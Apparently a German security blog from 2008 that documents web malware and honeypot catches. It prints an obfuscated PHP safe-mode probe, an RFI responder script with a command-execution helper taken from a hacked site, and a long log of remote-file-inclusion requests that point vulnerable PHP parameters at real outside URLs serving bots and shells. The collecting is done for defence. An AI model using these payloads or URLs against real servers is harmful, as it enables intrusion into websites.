Sticky Postings
[!] Hinweise zu den hier veröffentlichten Artikeln [!]
Achtung!
Dieses weblog befasst sich mit malware, Trojanern, Würmern und ähnlichem.
Grundsätzlich kann der Text in den Artikeln schädliche links enthalten.
Diese sind aber nicht als "klickbar" ausgeführt.
Insbesondere Text, der sich in einer 'code box' befindet,
Wer diese in seinen browser kopiert, läuft Gefahr sich mit malware zu infizieren.
Also bitte nicht ausprobieren, wenn ihr nicht nachvollziehen könnt,
worum es hier geht.
Falls ihr hier hingeraten seid, weil ihr nach pr0ns gesucht habt,
lasst euch nicht verarschen, bei den hier behandelten Seiten gibt es kein "Erwachsenenzeug" (adult),
diese Leute wollen euch nur richtig durchziehen.
Am Ende werden sie auch noch versuchen euch ein Anti-Virus Programm zu verkaufen,
dass jedoch auch nur "ZLOB" und/oder andere üble Gesellen mit sich bringt.
Hier geschriebene oder verlinkte Quellcodes dürfen selbstverständlich nicht dazu benutzt werden,
eine Straftat zu begehen oder diese vorzubereiten oder die Vorbereitung zu unterstützen.
Sie dienen dazu eure Honigtöpfe zu testen.
Alle Autoren untersagen ausdrücklich den Missbrauch hier erlangter Informationen.
Beiträge in der Rubrik [wirres] sind grundsätzlich als Satire zu betrachten.
Aus unerfindlichen Gründen ;) werden die "Scroll-Balken" (z.B. in der "Code-Box") unter IE nicht dargestellt.
Die Redaktion
Dieses weblog befasst sich mit malware, Trojanern, Würmern und ähnlichem.
Grundsätzlich kann der Text in den Artikeln schädliche links enthalten.
Diese sind aber nicht als "klickbar" ausgeführt.
Insbesondere Text, der sich in einer 'code box' befindet,
CODE:
code box
kann virulente Informationen enthalten.Wer diese in seinen browser kopiert, läuft Gefahr sich mit malware zu infizieren.
Also bitte nicht ausprobieren, wenn ihr nicht nachvollziehen könnt,
worum es hier geht.
Falls ihr hier hingeraten seid, weil ihr nach pr0ns gesucht habt,
lasst euch nicht verarschen, bei den hier behandelten Seiten gibt es kein "Erwachsenenzeug" (adult),
diese Leute wollen euch nur richtig durchziehen.
Am Ende werden sie auch noch versuchen euch ein Anti-Virus Programm zu verkaufen,
dass jedoch auch nur "ZLOB" und/oder andere üble Gesellen mit sich bringt.
Hier geschriebene oder verlinkte Quellcodes dürfen selbstverständlich nicht dazu benutzt werden,
eine Straftat zu begehen oder diese vorzubereiten oder die Vorbereitung zu unterstützen.
Sie dienen dazu eure Honigtöpfe zu testen.
Alle Autoren untersagen ausdrücklich den Missbrauch hier erlangter Informationen.
Beiträge in der Rubrik [wirres] sind grundsätzlich als Satire zu betrachten.
Aus unerfindlichen Gründen ;) werden die "Scroll-Balken" (z.B. in der "Code-Box") unter IE nicht dargestellt.
Die Redaktion
Tuesday, November 25. 2008
Dshield.org - Web Application Honeypot
Wie mir in einem Newsletter mitgeteilt wurde,
entwickelt dshield.org einen php-basierten "Web Application Honeypot".
Ihr könnt Euch auf Google-Code ein Bild vom Fortschritt der Entwicklung machen.
Ihr solltet Euch, wenn Ihr helfen möchtet, zunächst auf secure.dshield.org registrieren.
Dort könnt Ihr dann das tarball herunterladen.
Im Grunde besteht es nur aus einer index.php und templates,
die unterhalb des www-Pfades liegen.
Es lassen sich einfach neue templates hinzufügen,
deren Aufruf man in einer Konfigurationsdatei per RegEx steuern kann.
Ich denke das ganze ist einen Blick wert.
entwickelt dshield.org einen php-basierten "Web Application Honeypot".
Ihr könnt Euch auf Google-Code ein Bild vom Fortschritt der Entwicklung machen.
Ihr solltet Euch, wenn Ihr helfen möchtet, zunächst auf secure.dshield.org registrieren.
Dort könnt Ihr dann das tarball herunterladen.
Im Grunde besteht es nur aus einer index.php und templates,
die unterhalb des www-Pfades liegen.
Es lassen sich einfach neue templates hinzufügen,
deren Aufruf man in einer Konfigurationsdatei per RegEx steuern kann.
Ich denke das ganze ist einen Blick wert.
Monday, November 24. 2008
Holz aus Brasilien - this is fuckin cr4nk
Nachdem ich den freundlichen Kommentar von haterbreed entdeckt hatte,
habe ich einmal die gleiche Google-Suche gestartet, wie er es tat.
Neben meinem blog hier gabs auch noch andere Ergebnisse,
wie zum Beispiel diesen:
google cache von brasilwood.eu
Falls der Cache nicht mehr die ersetzte Seite zeigt,
habe ich hier einmal nen screenshot hinterlegt:
Klicken zum Vergrössern!
...oder hier den Text:
Nanu? cr4nk hat politische Intention?
Wer weiss.
habe ich einmal die gleiche Google-Suche gestartet, wie er es tat.
Neben meinem blog hier gabs auch noch andere Ergebnisse,
wie zum Beispiel diesen:
google cache von brasilwood.eu
Falls der Cache nicht mehr die ersetzte Seite zeigt,
habe ich hier einmal nen screenshot hinterlegt:
Klicken zum Vergrössern!
...oder hier den Text:
CODE:
Herzlichen Glückwunsch, sie wurden gehackt, besser gesagt ihr Webhoster.
Wir haben aber keine Interesse an ihren Daten und behalten uns vor irgendwelche Daten gestohlen zu haben, was wir mit Sicherheit getan haben.
Safe the Urwald and dont kaufe Holz aus Brasilien IHR SEID FÜR DIE GLOBALE ERWÄHRMUNG DER ERDE VERANTWORTLICH. HOLZ HAT AUCH gefühle.
Einen schönen Tag
Ihre Verbraucherschützer
well0ne und haterbreed
Autogramme gibts unter:
irc.unixunited.net #hilfeichwurdegehackt
Grettings to: unixunited, tng, Alpha-Accz und Satyr
Nanu? cr4nk hat politische Intention?
Wer weiss.
Thursday, November 6. 2008
Crank - this is fuckin cr4nk
CODE:
#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | this is fuckin cr4nk #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: cr4nk.sx.am #
# | |||||\ /||||| | cr4nk.6x.to #
# | |||'//\/\\`||| | #
# | |' m' /\ `m `| | wh00ps nothin more here #
# | /||\ | #
# \_ _/ #
# `------------' #
#####################################################################
$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\15
7\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "
\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x
6ff\x66";}exit(); ?>
crank? crank.ws ist Geschichte.
Viel Spass beim Nachforschen!
Sunday, October 12. 2008
Webseite des SPD Ortsverbandes Esens-Nord gehackt
Damit mir nicht jemand vorwirft ich sei politisch,
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)
...mal sehen wielange es dauert bis die Datei entfernt wird.
UPDATE: ...noch nicht entfernt
oO
veröffentliche ich hier einmal den Link zum responsefile,
das Teil eines Angriffes auf eine meiner domains war:
(...auch die SPD hilft beim Verteilen von RFI/LFI/SQLI bots)
http://spd-esens.de/spd/contentimage/bid.txtOder ist sowas nur interessant, wenn es beim jährlichen CCC Treffen passiert?
CODE:
<?php
echo "549821347819481<br />";
//VaRiaBiLi Di SiSTeMa
$uname = @php_uname();
//eCHo
echo "uname -a: $uname<br />";
//SAFE OFF
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
$contrs=0;}
else{
$contrs=1;
}}
if($contrs == 0)
{
echo("uid=");
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
?>
...mal sehen wielange es dauert bis die Datei entfernt wird.
UPDATE: ...noch nicht entfernt
CODE:
Thu Oct 16 19:48:23 CEST 2008
--19:48:23-- http://spd-esens.de/spd/contentimage/bid.txt
=> `bid.txt'
Resolving spd-esens.de... 87.238.199.52
Connecting to spd-esens.de|87.238.199.52|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,360 (1.3K) [text/plain]
100%[==================================================================================================================>] 1,360 --.--K/s
19:48:24 (41.84 MB/s) - `bid.txt' saved [1360/1360]
oO
Friday, October 3. 2008
onspeed.com als Beschleuniger für hacker
onspeed.com ist laut deren Webseite ein Dienst,
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:
der langsame Verbindungen beim browsen beschleunigen soll.
Wenn ich dies richtig verstanden habe,
bekommt man für knapp 25 Dollars Zugang zu einem Service,
der Browseranfragen aus einem Cache mit gepackten Daten beantwortet. (deflate)
Ebenso ist es aber dadurch möglich,
RFI scans mit einer ziemlich hohen Geschwindigkeit durchzuführen.
Das soll jetzt keine Werbung sein.
Ich meine das ernst.
onspeed hat bisher nicht auf meine mails geantwortet,
daher nun meine Empfehlung an alle Admins, Hostmaster und was immer folgende domains/IPs zu blocken:
Stand 3.10.2008 17:05 domain IP --------------------------------------------------------- navaho.onspeed.com 72.3.137.82 yuma.onspeed.com 72.3.137.83 vanadium.onspeed.com 83.138.172.72 chromium.onspeed.com 83.138.172.76 silicon.onspeed.com 212.100.250.218 sulphur.onspeed.com 212.100.250.225 aluminium.onspeed.com 212.100.250.217 nickel.onspeed.com 212.100.250.230Ich persönlich habe kein Problem damit etwas grosszügiger zu sein:
72.3.137.0/24 83.138.172.0/24 212.100.250.0/24Hier ein Auszug aus der abuse mail:
Saturday, September 13. 2008
[honeyd] rfi - listen
Der Andrang ist inzwischen so gross geworden, mich zum Opfer zu machen,
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)
Hier die letzten Einschläge:
sodass ich während ich Skripte versuche zu erstellen,
die Situation sich schon wieder dermassen geändert hat,
dass ich das Konzept wieder neu überdenken muss ;)
Hier die letzten Einschläge:
CODE:
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
///doceboCms/class//errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
///doceboCms/class//errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
//reports.php?sub=http://vnc2008.webcindario.com/id44.txt??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/home.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
//reports.php?sub=http://vnc2008.webcindario.com/id44.txt??
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//reports.php?sub=http://www.hotelsunflower.it/modules/rhs/idv6.txt???
//reports.php?sub=http://www.hotelsunflower.it/modules/rhs/idv6.txt???
//reports.php?sub=http://www.hotelsunflower.it/modules/rhs/idv6.txt???
//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sunter.us/a.txt?
//zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/index.php?r=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//init_basic.php?GALLERY_BASEDIR=http://smba.jinju.ac.kr/ismael.txt????
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
///doceboCms/class//errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/head.php?adresa=http://jamesmng.freehostia.com/r57.txt??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/head.php?adresa=http://herk.freehostia.com/prv/pbot.txt?
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/head.php?adresa=http://www.robinwood7.xpg.com.br/enviando.php3?
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
///doceboCms/class//errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/head.php?adresa=http://www.robinwood7.xpg.com.br/enviando.php3?
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.edoloshop.it/images/inv??
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
//Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//include/lib.inc.php?site_path=http://tb4run.t35.com/alb.spread.gif?
//include/lib.inc.php?site_path=http://tb4run.t35.com/alb.spread.gif?
/index1.php?menu=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/str.php?page=http://tb4run.t35.com/alb.spread.gif?
//sohoadmin/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/safe1.txt???
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/reports.php?sub=http://tb4run.t35.com/alb.spread.gif?
/str.php?page=http://tb4run.t35.com/alb.spread.gif?
/reports.php?sub=http://tb4run.t35.com/alb.spread.gif?
//read.php?fpage=http://tb4run.t35.com/alb.spread.gif?
/view.php?sub=http://tb4run.t35.com/alb.spread.gif?
/home.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/head.php?adresa=http://smart4media.ro/media/tancap.txt??
/errors.php?error=http://tb4run.t35.com/alb.spread.gif?
/errors.php?error=http://tb4run.t35.com/alb.spread.gif?
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sunter.us/a.txt?
/index2.php?p=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index2.php?p=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index1.php?menu=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//faqsupport/samplefaqsupport.php?path[docroot]=http://www.autosate.ru/images/borda.jpg?
/index.php?site=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//Neos_Chronos/header.php?base_folder=http://8.19.35.63/bhl/id.txt?
/index.php?site=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/head.php?adresa=http://h1.ripway.com/g3r1ly4/botping.txt???
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.coaching-pool-coach.de/id.txt??
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/head.php?adresa=http://white.be/info.txt?
/head.php?adresa=http://www.robinwood7.xpg.com.br/enviando.php3?
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
///classes/adodbt/sql.php?classes_dir=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
/head.php?adresa=http://h1.ripway.com/g3r1ly4/botping.txt???
/head.php?adresa=http://intermoto.ovh.org/mambo/west.txt?
/head.php?adresa=http://jamesmng.freehostia.com/r57.txt??
//zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//includes/header.php?c_temp_path=http://tanahdijual.com/id.txt???
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sunter.us/a.txt?
/head.php?adresa=http://6babe.dk/st/c.txt?
/head.php?adresa=http://6babe.dk/st/c.txt?
//include/lib.inc.php?site_path=http://www.autosate.ru/images/borda.jpg?
/head.php?adresa=http://h1.ripway.com/g3r1ly4/botping.txt???
/akocomments.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/lib.inc.php?site_path=http://www.autosate.ru/images/borda.jpg?
//facileforms.frame.php?ff_compath=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//admin/business_inc/saveserver.php?thisdir=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
//init_basic.php?GALLERY_BASEDIR=http://smba.jinju.ac.kr/ismael.txt????
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
///doceboCms/class//errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/akocomments.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
/akocomments.php?mosConfig_absolute_path=http://tb4run.t35.com/alb.spread.gif?
//index.php?autoLoadConfig[999][0][autoType]=http://tb4run.t35.com/alb.spread.gif?
//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/id.txt??
//Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
///doceboCms/class//errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
///doceboCms/class//errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//index.php?pag=http://www.geocities.com/kucluxanang/id2.txt??
//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/cmd.txt?
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
///doceboCms/class//errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/home.php?x=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/head.php?adresa=http://www.stormpages.com/baliku/sayank.txt??
//zero_vote/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//include/admin.lib.inc.php?site_path=http://tanahdijual.com/id.txt???
//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://8.19.35.63/bhl/id.txt?
/index.php?pag=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?pag=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?pag=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?pag=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
//include/admin.lib.inc.php?site_path=http://tanahdijual.com/id.txt???
//include/admin.lib.inc.php?site_path=http://tanahdijual.com/id.txt???
///doceboCms/class//errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//include/admin.lib.inc.php?site_path=http://tanahdijual.com/id.txt???
/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.edoloshop.it/images/inv??
//agendax/addevent.inc.php?agendax_path=http://8.19.35.63/bhl/id.txt?
//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/cmd.txt?
///doceboCms/class//errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
//skin/zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://8.19.35.63/bhl/id.txt?
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/?sourcedir=http://www.satinvestigacion.net/foro5/includes/TT??
/akocomments.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
//zero_vote/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/admin/editeur/spaw_control.class.php?spaw_root=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sunter.us/a.txt?
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//content/multithumb/multithumb?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
/head.php?adresa=http://h1.ripway.com/ir4wan/geni.txt???
//Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/doc//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/id.txt??
//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/id.txt??
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cnpl.lu/upload/cmd.txt?
//index.php?sub=http://geocities.com/septilianaocha/header.jpg?
//path/include/errors.php?error=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
///doceboCms/class//errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//ashnews.php?pathtoashnews=http://www.autosate.ru/images/borda.jpg?
/index.php?load=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do???
/fout.php?fout=http://www.orgnet.hu/ezustfenyoszallo/kepek/mraneti.txt???
//mes-stats/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
/head.php?adresa=http://h1.ripway.com/ir4wan/geni.txt???
/doc//index.php?option=com_custompages&cpage=http://www.ds5vxk.com/board/cmd.txt?
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://www.satinvestigacion.net/foro5/includes/TT??
/head.php?adresa=http://usil.web.id/nenen.txt?
/head.php?adresa=http://usil.web.id/nenen.txt?
/doc//index.php?option=com_custompages&cpage=http://www.geocities.com/kucluxanang/id2.txt??
//index.php?option=com_custompages&cpage=http://www.geocities.com/kucluxanang/id2.txt??
//admin/business_inc/saveserver.php?thisdir=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/head.php?adresa=http://tua-gila.t35.com/tua.txt?
/head.php?adresa=http://h1.ripway.com/g3r1ly4/botping.txt???
/head.php?adresa=http://tua-gila.t35.com/tua.txt?
/head.php?adresa=http://myr.wz.cz/upload/skins/max.txt?
/akocomments.php?mosConfig_absolute_path=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
/head.php?adresa=http://h1.ripway.com/grunge/bot.txt?
/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://www.edoloshop.it/images/inv??
//path/Full_Release/include/errors.php?error=http://www.coaching-pool-coach.de/id.txt??
//addpost_newpoll.php?addpoll=preview&thispath=http://www.edoloshop.it/images/inv??
//admin/admin_styles.php?phpbb_root_path=http://rafiantika.fileave.com/child.txt??
